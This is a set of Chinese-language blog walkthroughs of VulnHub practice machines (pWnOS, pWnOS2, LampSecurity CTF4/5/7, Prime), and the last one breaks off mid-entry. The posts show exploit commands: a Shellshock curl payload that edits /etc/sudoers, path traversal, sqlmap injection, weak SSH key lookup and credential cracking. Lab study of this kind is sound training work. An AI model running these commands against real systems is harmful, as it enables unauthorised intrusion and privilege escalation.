<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p><img src="/2023/04/21/pWnOS/image-20230420230814057.png" alt="image-20230420230814057"></p><p>主机的ip地址为:192.168.37.156</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p><img src="/2023/04/21/pWnOS/image-20230420231126078.png" alt="image-20230420231126078"></p><p><img src="/2023/04/21/pWnOS/image-20230420231153425.png" alt="image-20230420231153425"></p><p><img src="/2023/04/21/pWnOS/image-20230420233052448.png" alt="image-20230420233052448"></p><h2 id="Web渗透"><a href="#Web渗透" class="headerlink" title="Web渗透"></a>Web渗透</h2><p>nmap结果显示10000端口存在可利用的漏洞</p><p>利用searchsploit查看漏洞利用 Arbitrary File Disclosure 任意文件泄露</p><p><img src="/2023/04/21/pWnOS/image-20230420233558907.png" alt="image-20230420233558907"></p><p><img src="/2023/04/21/pWnOS/image-20230420233815548.png" alt="image-20230420233815548"></p><p><img src="/2023/04/21/pWnOS/image-20230420233901884.png" alt="image-20230420233901884"></p><p>将内容存放在hash.txt后用john破解获得密码</p><p><img src="/2023/04/21/pWnOS/image-20230421102151592.png" alt="image-20230421102151592"></p><p><img src="/2023/04/21/pWnOS/image-20230421102203953.png" alt="image-20230421102203953"></p><p>获得账号vmware 密码为h4ckm3 ssh连接</p><p><img src="/2023/04/21/pWnOS/image-20230421102219768.png" alt="image-20230421102219768"></p><p>成功获得初始权限shell</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>通过2017.pl能够查看到shadow文件内容,而访问shadow文件时需要一定的root权限,可以看出这个perl脚本在进行文件包含的时候是拥有root权限的。此时将getshell 的perl脚本修改后缀名为.cgi上传至系统上,在使用2017.pl进行文件包含的时候,就能执行这个cgi程序,成功getshell。而此时获得的权限将是root权限</p><blockquote><p>CGI程序可以是Python脚本,PERL脚本,SHELL脚本,C或者C++程序等。</p></blockquote><p><img src="/2023/04/21/pWnOS/image-20230421121913020.png" alt="image-20230421121913020"></p><p>上传路径应是/home/vmware,当前的初始shell就是用户vmware,能够在该文件夹中进行下载文件操作</p><p><img src="/2023/04/21/pWnOS/image-20230421122104221.png" alt="image-20230421122104221"></p><p>cgi是程序,要记得给可执行权限</p><p><img src="/2023/04/21/pWnOS/image-20230421122034193.png" alt="image-20230421122034193"></p><p>成功提权</p><p><img src="/2023/04/21/pWnOS/image-20230421122202992.png" alt="image-20230421122202992"></p><p>方法二:</p><p><img src="/2023/04/21/pWnOS/image-20230421152111698.png" alt="image-20230421152111698"></p><p>如果有试过免密登陆则会成功该文件</p><blockquote><p>/.ssh/authorized_keys 生成的原因</p><p>在 SSH协议中,公钥认证是一种用于身份验证的方法。这种方法允许用户使用密钥对进行身份验证,而无需输入密码。公钥认证通常使用一对密钥来完成,一把是公钥,另一把是私钥。私钥通常保存在客户端,而公钥则被添加到服务器上的“authorized_keys”文件中。</p><p>当用户使用 SSH 连接到远程服务器时,SSH 会尝试匹配客户端发送的公钥和服务器上保存的公钥。如果匹配成功,用户就可以成功连接到服务器。</p><p>因此,/.ssh/authorized_keys 文件是用于保存公钥的文件,它的生成是为了在使用 SSH 连接时进行身份验证。当用户在客户端生成一对公钥和私钥时,用户需要将公钥复制到服务器上的 /.ssh/authorized_keys 文件中。这样,当用户使用 SSH 连接到服务器时,服务器可以使用保存在 authorized_keys 文件中的公钥来验证用户的身份。</p></blockquote><blockquote><p>敏感文件库</p><p><a href="https://github.com/carlospolop/Auto_Wordlists">https://github.com/carlospolop/Auto_Wordlists</a></p><p>无思路可看</p></blockquote><p>拿到这个文件,接下来就要用私钥对公钥进行碰撞</p><p>prng pseudo random number generator (伪随机数生成器)</p><p><img src="/2023/04/21/pWnOS/image-20230421152851223.png" alt="image-20230421152851223"></p><p><img src="/2023/04/21/pWnOS/image-20230421153605400.png" alt="image-20230421153605400"></p><p>按照这4个步骤使用</p><p>1.下载私钥公钥文件对</p><p><img src="/2023/04/21/pWnOS/image-20230421153712737.png" alt="image-20230421153712737"></p><p>库的内容已经转移到gitLab</p><p>新网址:<a href="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/5622.tar.bz2">https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/5622.tar.bz2</a></p><p>解压后进入目录</p><p><code>grep -lr 'AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgv'</code></p><p>对该目录下所有文件内容进行搜索,搜索文件中含有关键词AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgv的文件</p><p><img src="/2023/04/21/pWnOS/image-20230421160222059.png" alt="image-20230421160222059"></p><p><img src="/2023/04/21/pWnOS/image-20230421160424731.png" alt="image-20230421160424731"></p><p>该pub文件内容是公钥,没有扩展名的文件则为私钥,查看私钥</p><p><img src="/2023/04/21/pWnOS/image-20230421160613342.png" alt="image-20230421160613342"></p><p><img src="/2023/04/21/pWnOS/image-20230421161334998.png" alt="image-20230421161334998"></p><p><img src="/2023/04/21/pWnOS/image-20230421161314855.png" alt="image-20230421161314855"></p><p>成功获得系统初始shell</p><p>查看bash版本 当版本<4.3 很可能存在shell shock漏洞 </p><p><img src="/2023/04/21/pWnOS/image-20230421161929858.png" alt="image-20230421161929858"></p><p>验证语句</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">env x='() { :; }; echo "It is vulnerable"' bash -c date</span><br></pre></td></tr></table></figure><p><img src="/2023/04/21/pWnOS/image-20230421162317739.png" alt="image-20230421162317739"></p><p>存在漏洞</p><p>创建1.cgi文件 并赋予可执行权限 </p><p>1.cgi文件内容为 #!/bin/bash</p><p><img src="/2023/04/21/pWnOS/image-20230421163618265.png" alt="image-20230421163618265"></p><p><code>curl http://192.168.37.156:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/1.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL)ALL" >> /etc/sudoers'</code></p><p><img src="/2023/04/21/pWnOS/image-20230421163706029.png" alt="image-20230421163706029"></p><p>将一个 sudo 权限的用户添加到 /etc/sudoers 文件中,从而使该用户获得 root 权限,可以执行任意命令。</p><p><img src="/2023/04/21/pWnOS/image-20230421164356170.png" alt="image-20230421164356170"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>pWnOS2</title>
<link href="/2023/04/19/pWnOS2/"/>
<url>/2023/04/19/pWnOS2/</url>
<content type="html"><![CDATA[<h1 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h1><p><img src="/2023/04/19/pWnOS2/image-20230419184837454.png" alt="image-20230419184837454"></p><p>需要设置网络</p><p><img src="/2023/04/19/pWnOS2/image-20230419190518461.png" alt="image-20230419190518461"></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p><img src="/2023/04/19/pWnOS2/image-20230419190720917.png" alt="image-20230419190720917"></p><p>靶机ip:10.10.10.101</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p><img src="/2023/04/19/pWnOS2/image-20230419190842652.png" alt="image-20230419190842652"></p><p><img src="/2023/04/19/pWnOS2/image-20230419191031046.png" alt="image-20230419191031046"></p><p><img src="/2023/04/19/pWnOS2/image-20230419191453168.png" alt="image-20230419191453168"></p><p>只有80端口,目标明确直接开始web渗透</p><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><h3 id="目录爆破"><a href="#目录爆破" class="headerlink" title="目录爆破"></a>目录爆破</h3><p><img src="/2023/04/19/pWnOS2/image-20230419193922789.png" alt="image-20230419193922789"></p><p>访问blog,存在一个登陆窗口 尝试sql注入失败</p><p><img src="/2023/04/19/pWnOS2/image-20230420112011263.png" alt="image-20230420112011263"></p><h3 id="CMS指纹利用"><a href="#CMS指纹利用" class="headerlink" title="CMS指纹利用"></a>CMS指纹利用</h3><p>Ctrl + U 查看网页源码</p><p><img src="/2023/04/19/pWnOS2/image-20230419194252821.png" alt="image-20230419194252821"></p><p>发现网站的cms</p><p>用searchexploit查看exp</p><p><img src="/2023/04/19/pWnOS2/image-20230420112128829.png" alt="image-20230420112128829"></p><p>下载利用文件 perl 1191.pl执行</p><p><img src="/2023/04/19/pWnOS2/image-20230420112200588.png" alt="image-20230420112200588"></p><p>经测试-e中的1和2无法正常使用 尝试用3修改账号密码,登陆blog</p><p><img src="/2023/04/19/pWnOS2/image-20230420145632076.png" alt="image-20230420145632076"></p><p><img src="/2023/04/19/pWnOS2/image-20230420145648090.png" alt="image-20230420145648090"></p><p>出现一些新功能</p><p><img src="/2023/04/19/pWnOS2/image-20230420145711342.png" alt="image-20230420145711342"></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>文件上传,上传shell,尝试访问/images/shell.php 本地监听1234端口,反弹shell</p><p><img src="/2023/04/19/pWnOS2/image-20230420150019130.png" alt="image-20230420150019130"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>存在root 用户and dan用户</p><p><img src="/2023/04/19/pWnOS2/image-20230420153811528.png" alt="image-20230420153811528"></p><p>查看mysqli_connect.php获得数据库账号密码</p><p><img src="/2023/04/19/pWnOS2/image-20230420151457324.png" alt="image-20230420151457324"></p><p>显示密码错误。大概是一个旧的数据库文件,利用全局搜索查看系统中是否还存在mysqli_connect.php文件</p><p><img src="/2023/04/19/pWnOS2/image-20230420151708725.png" alt="image-20230420151708725"></p><p><img src="/2023/04/19/pWnOS2/image-20230420151821123.png" alt="image-20230420151821123"></p><p>获得另一个新的账号密码</p><p><img src="/2023/04/19/pWnOS2/image-20230420151849828.png" alt="image-20230420151849828"></p><p>在mysql数据库的users表中查到内容<img src="/2023/04/19/pWnOS2/image-20230420152230801.png" alt="image-20230420152230801"></p><p>hash-identifier识别为SHA-1</p><p><img src="/2023/04/19/pWnOS2/image-20230420153058676.png" alt="image-20230420153058676"></p><p><a href="https://hashes.com/en/decrypt/hash">https://hashes.com/en/decrypt/hash</a></p><p><img src="/2023/04/19/pWnOS2/image-20230420153031328.png" alt="image-20230420153031328"></p><p><img src="/2023/04/19/pWnOS2/image-20230420153658422.png" alt="image-20230420153658422"></p><p><img src="/2023/04/19/pWnOS2/image-20230420154002193.png" alt="image-20230420154002193"></p><p>在mysqli_connect.php中也存在账号密码登陆数据库,尝试用该密码登陆root账号 成功登陆(往往网站管理员会在不同地方设置相同的账号密码)</p><p><img src="/2023/04/19/pWnOS2/image-20230420154117645.png" alt="image-20230420154117645"></p><p>成功提权root用户</p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF7</title>
<link href="/2023/04/18/LampSecurityCTF7/"/>
<url>/2023/04/18/LampSecurityCTF7/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><blockquote><p>在使用nmap时,发现此靶机搜索不到ip。解决方案如下</p><p><a href="https://blog.csdn.net/sinat_35845281/article/details/126067936">CTF7靶机搜索不到ip问题</a></p></blockquote><p><code>nmap -sn 192.168.37.0/24</code></p><img src="/2023/04/18/LampSecurityCTF7/image-20230417191211759.png" alt="image-20230417191211759" style="zoom: 67%;"><p>靶机ip:192.168.37.153</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p><code>sudo nmap --min-rate=10000 -p- 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417191852697.png" alt="image-20230417191852697"></p><p><code>sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192209139.png" alt="image-20230417192209139"></p><p>存在两个web服务,分别在服务器上的80,8080端口上</p><h3 id="nmap漏洞扫描"><a href="#nmap漏洞扫描" class="headerlink" title="nmap漏洞扫描"></a>nmap漏洞扫描</h3><p><code>sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.37.153</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192443832.png" alt="image-20230417192443832"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417192526096.png" alt="image-20230417192526096"></p><p>没有直接的关键信息</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><h3 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>80端口</h3><p>浏览发现存在账户登陆与创建账户</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417193919733.png" alt="image-20230417193919733"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417193942888.png" alt="image-20230417193942888"></p><p>创建账户登陆后,发现疑似存在sql注入点</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417194150755.png" alt="image-20230417194150755"></p><p>利用sqlmap尝试sql注入</p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs </code></p><p>F12在console处输入document.cookie查看sessid</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417194345709.png" alt="image-20230417194345709"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230417195157466.png" alt="image-20230417195157466"></p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs -D website --tables</code></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418155347844.png" alt="image-20230418155347844"></p><p><code>sqlmap -u "http://192.168.37.153/newsletter&id=1" --cookie="PHPSESSID=mt4a0vcp21m5koj76emphcsd73" --dbs -D website --tables -T users --columns</code><br><img src="/2023/04/18/LampSecurityCTF7/image-20230418155409000.png" alt="image-20230418155409000"></p><p>无password列,走不通</p><h3 id="8080端口"><a href="#8080端口" class="headerlink" title="8080端口"></a>8080端口</h3><p>是一个登陆界面,尝试利用sql万能语句登陆</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418184434049.png" alt="image-20230418184434049"></p><p>没有过滤直接成功登陆</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418184531686.png" alt="image-20230418184531686"></p><p>应该是一个后台管理系统</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185029522.png" alt="image-20230418185029522"></p><p>在此处可以发表一篇Newsletters,而在80端口上可以查看到内容。</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185154885.png" alt="image-20230418185154885"></p><p>当内容是文本,无法反弹shell</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418185541016.png" alt="image-20230418185541016"></p><p>发现文件上传,尝试用上传php文件反弹shell</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191013848.png" alt="image-20230418191013848"></p><p>成功上传php文件,此时就要获取shell.php所在的目录</p><p>通过目录爆破结果,访问/assets,获得shell.php所在位置</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191809547.png" alt="image-20230418191809547"></p><p>点击shell.php后成功反弹shell</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418191853937.png" alt="image-20230418191853937"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>在/var/www/admin/inc目录上发现db.php文件,文件内容表示数据库无密码</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418192726458.png" alt="image-20230418192726458"></p><p>登陆数据库</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193443482.png" alt="image-20230418193443482"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193525075.png" alt="image-20230418193525075"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418193425832.png" alt="image-20230418193425832"></p><p>其中brain账户是存在登陆记录的,优先把目标放在它身上</p><p>将数据存放在data.txt中,并用awk分别分割username和password 存放在user.txt passwd.txt中</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418194109809.png" alt="image-20230418194109809"></p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418194209337.png" alt="image-20230418194209337"></p><p>通过md5解密,将明文密码存放在1.txt中 挨个尝试后可知道对应的账号密码为:brian:my2cents</p><p>切换用户</p><p><img src="/2023/04/18/LampSecurityCTF7/image-20230418201611686.png" alt="image-20230418201611686"></p><p>成功提权</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>在80端口中尝试用sqlmap进行sql注入获得的内容和后续获得初始权限中的数据库内容一致,但不知道为何mysql无法爆出password列导致无法直接获得账号密码,有点奇怪。(待解决)</p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF5</title>
<link href="/2023/04/15/LampSecurityCTF5/"/>
<url>/2023/04/15/LampSecurityCTF5/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p><code>sudo nmap -sn 192.168.37.0/24</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153955264.png" alt="image-20230415153955264" style="zoom:50%;"><p>主机IP:192.168.37.152</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.152</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153940419.png" alt="image-20230415153940419" style="zoom:50%;"><p>发现以上端口服务</p><p><code>sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306 192.168.37.152</code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153932643.png" alt="image-20230415153932643" style="zoom:50%;"><h2 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="WEB渗透"></a>WEB渗透</h2><p>访问80端口</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153924529.png" alt="image-20230415153924529"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><code>dirsearch -u 192.168.37.152 -e * </code></p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153912861.png" alt="image-20230415153912861" style="zoom:50%;"><img src="/2023/04/15/LampSecurityCTF5/image-20230415153903694.png" alt="image-20230415153903694" style="zoom:50%;"><img src="/2023/04/15/LampSecurityCTF5/image-20230415153856454.png" alt="image-20230415153856454" style="zoom:50%;"><p>存在好几个登陆入口</p><h3 id="指纹利用"><a href="#指纹利用" class="headerlink" title="指纹利用"></a>指纹利用</h3><p>在首页中点击Blog进入Andy Carp’s Blog页面,该博客以NanoCMS作为框架</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153847605.png" alt="image-20230415153847605"></p><p>存在需要管理员权限的RCE漏洞</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153838648.png" alt="image-20230415153838648"></p><p>存在一个信息泄露</p><p>访问/data/pagesdata.txt </p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153828653.png" alt="image-20230415153828653"></p><p>一段序列化的内容,里面存放着passwd密文</p><p>用hash-indentifier密文识别</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153816750.png" alt="image-20230415153816750" style="zoom:50%;"><p>大概率是md5加密</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153805965.png" alt="image-20230415153805965"></p><p>密码为shannon</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153754049.png" alt="image-20230415153754049" style="zoom:67%;"><p>修改page内容,写入一句话木马反弹shell</p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153743613.png" alt="image-20230415153743613" style="zoom:67%;"><p>访问 <code>../index.php?page=contact</code>后</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153734558.png" alt="image-20230415153734558"></p><p>成功反弹shell</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查看/etc/passwd文件,存在多个用户账号<img src="/2023/04/15/LampSecurityCTF5/image-20230415153723253.png" alt="image-20230415153723253" style="zoom:67%;"></p><blockquote><p><strong>“用户标识号”</strong></p><p>用户的uid,一般情况下root为0,1-499默认为系统账号,有的更大些到1000,500-65535为用户的可登录账号,有的系统从1000开始。</p></blockquote><p><strong>用户比较多的情况下,利用全局搜索出关于相关用户的记录</strong></p><p><code>grep -R -i pass /home/* 2>/dev/null</code></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153712137.png" alt="image-20230415153712137"></p><p><code>cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note</code></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153705060.png" alt="image-20230415153705060"></p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153653667.png" alt="image-20230415153653667"></p><blockquote><p>standard in must be a tty</p><p>通常是由于命令在非交互式 shell 环境下运行而导致的。当您尝试在一个非交互式 shell 环境中运行需要从标准输入读取数据的命令时,就会出现这个错误.</p></blockquote><p>因此通过python切换交互<code>python -c "import pty; pty.spawn('/bin/sh')"</code></p><blockquote><p>这个命令可以在当前终端创建一个交互式的 shell,通常用于在一个没有完整 shell 权限的终端中提升权限。</p></blockquote><p>成功提权</p><p><img src="/2023/04/15/LampSecurityCTF5/image-20230415153546136.png" alt="image-20230415153546136"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>LampSecurityCTF4</title>
<link href="/2023/03/29/LampSecurityCTF4/"/>
<url>/2023/03/29/LampSecurityCTF4/</url>
<content type="html"><![CDATA[<h1 id="LampSecurityCTF4"><a href="#LampSecurityCTF4" class="headerlink" title="LampSecurityCTF4"></a>LampSecurityCTF4</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p><code>sudo nmap -sn 192.168.37.0/24</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230552578.png" alt="image-20230328230552578"></p><p>主机IP:192.168.37.148</p><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p><code>sudo nmap --min-rate=10000 -p- 192.168.37.148</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230712302.png" alt="image-20230328230712302"></p><p><code>sudo nmap -sT -sV -O -p22,25,80,631 192.168.37.148</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328230824664.png" alt="image-20230328230824664"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328232343871.png" alt="image-20230328232343871"></p><p><code>robots.txt</code>中显示</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /mail/</span><br><span class="line">Disallow: /restricted/</span><br><span class="line">Disallow: /conf/</span><br><span class="line">Disallow: /sql/</span><br><span class="line">Disallow: /admin/</span><br></pre></td></tr></table></figure><p><code>/conf/</code>访问报错,<code>/restricted/</code>,<code>/mail/</code>,<code>/admin/</code>都需要登录</p><p><code>/sql/</code>目录可以直接查看,<code>/sql/db.sql</code>可以被直接访问,内容如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use ehks;</span><br><span class="line">create table user (user_id int not null auto_increment primary key, user_name varchar(20) not null, user_pass varchar(32) not null);</span><br><span class="line">create table blog (blog_id int primary key not null auto_increment, blog_title varchar(255), blog_body text, blog_date datetime not null);</span><br><span class="line">create table comment (comment_id int not null auto_increment primary key, comment_title varchar (50), comment_body text, comment_author varchar(50), comment_url varchar(50), comment_date datetime not null);</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>/pages是一个目录,有blog.php等文件,与前端的页面内容一致,可能存在路径穿越</p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328235139390.png" alt="image-20230328235139390"></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328235201903.png" alt="image-20230328235201903"></p><h2 id="Web渗透"><a href="#Web渗透" class="headerlink" title="Web渗透"></a>Web渗透</h2><h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328232318993.png" alt="image-20230328232318993"></p><p>在测试中发现sql注入点</p><p>利用sqlmap获得数据库内容</p><p><code>sqlmap -u 'http://192.168.37.148/index.html?page=blog&title=Blog&id=2' --dbs --dump --batch</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230328234736065.png" alt="image-20230328234736065"></p><p>均可进入<code>/admin/</code>后台,测试同样可以作为ssh连接并提权到<code>root</code></p><p>在SSH连接时出现该错误,对其补足参数</p><p><code>sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss [email protected]</code></p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230329000239530.png" alt="image-20230329000239530"></p><h3 id="目录穿越"><a href="#目录穿越" class="headerlink" title="目录穿越"></a>目录穿越</h3><p>上文提到url的访问格式是 <code>index.html?page=blog&title=Blog&id=2</code>推断源码为<code>include($_GET[$page].'.php')</code></p><p>利用whatweb分析出其php版本为5.1.2, php版本小于5.3.4,存在%00截断</p><p><img src="/2023/03/29/LampSecurityCTF4/image-20230329001412916.png" alt="image-20230329001412916"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>Prime</title>
<link href="/2023/03/17/Prime/"/>
<url>/2023/03/17/Prime/</url>
<content type="html"><![CDATA[<h2 id="靶机介绍"><a href="#靶机介绍" class="headerlink" title="靶机介绍"></a>靶机介绍</h2><blockquote><p>This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.</p><p>This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed.</p><p>So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed</p><p>Visit our website <a href="http://hacknpentest.com/">http://hacknpentest.com</a> and <a href="http://hnpsecurity.com/">http://hnpsecurity.com</a>.</p></blockquote><p><strong>靶机IP</strong></p><p><img src="/2023/03/17/Prime/image-20230315130246204.png"></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.138</code></p><p><code>sudo nmap -sT -sV -O -p22,80 192.168.37.138</code></p><p><img src="/2023/03/17/Prime/image-20230315130505547.png" alt="image-20230315130505547"></p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><code>dirsearch -u 192.168.37.138 -e * -x 403</code></p><p><img src="/2023/03/17/Prime/image-20230315144425580.png" alt="image-20230315144425580"></p><h4 id="x2F-dev"><a href="#x2F-dev" class="headerlink" title="/dev"></a>/dev</h4><p><img src="/2023/03/17/Prime/image-20230315144436401.png" alt="image-20230315144436401"></p><p>这是一个提示,我们通过扫描获得该提示,那说明我们再深度扫描一下</p><h4 id="x2F-wordpress-x2F-wp-login-php"><a href="#x2F-wordpress-x2F-wp-login-php" class="headerlink" title="/wordpress/wp-login.php"></a>/wordpress/wp-login.php</h4><p><img src="/2023/03/17/Prime/image-20230315144454527.png" alt="image-20230315144454527"></p><p>wordpress的后台登陆系统</p><h4 id="x2F-wordpress"><a href="#x2F-wordpress" class="headerlink" title="/wordpress"></a>/wordpress</h4><p><img src="/2023/03/17/Prime/image-20230315144531119.png" alt="image-20230315144531119"></p><p>wordpress框架</p><p>用dirb 再次扫描 <code>dirb http://192.168.37.138 -X .txt,.zip</code></p><p><img src="/2023/03/17/Prime/image-20230315151948348.png" alt="image-20230315151948348"></p><h4 id="x2F-secret-txt"><a href="#x2F-secret-txt" class="headerlink" title="/secret.txt"></a>/secret.txt</h4><p><img src="/2023/03/17/Prime/image-20230315152030249.png" alt="image-20230315152030249"></p><p>这个提示告诉我需要对已找到的php页面进行模糊测试,找到一个正确的参数,同时这里也出现了一个location.txt需要我们去查看</p><p>其中给了个链接, 该链接是一个kali自带的用于模糊测试的工具 <code>wfuzz</code></p><p><code>dirb http://192.168.37.138 -X .php</code></p><p>寻找php页面</p><p><img src="/2023/03/17/Prime/image-20230315153524253.png" alt="image-20230315153524253"></p><h3 id="Fuzz"><a href="#Fuzz" class="headerlink" title="Fuzz"></a>Fuzz</h3><h4 id="x2F-image-php"><a href="#x2F-image-php" class="headerlink" title="/image.php"></a>/image.php</h4><p><img src="/2023/03/17/Prime/image-20230315155156090.png" alt="image-20230315155156090"></p><h4 id="x2F-index-php"><a href="#x2F-index-php" 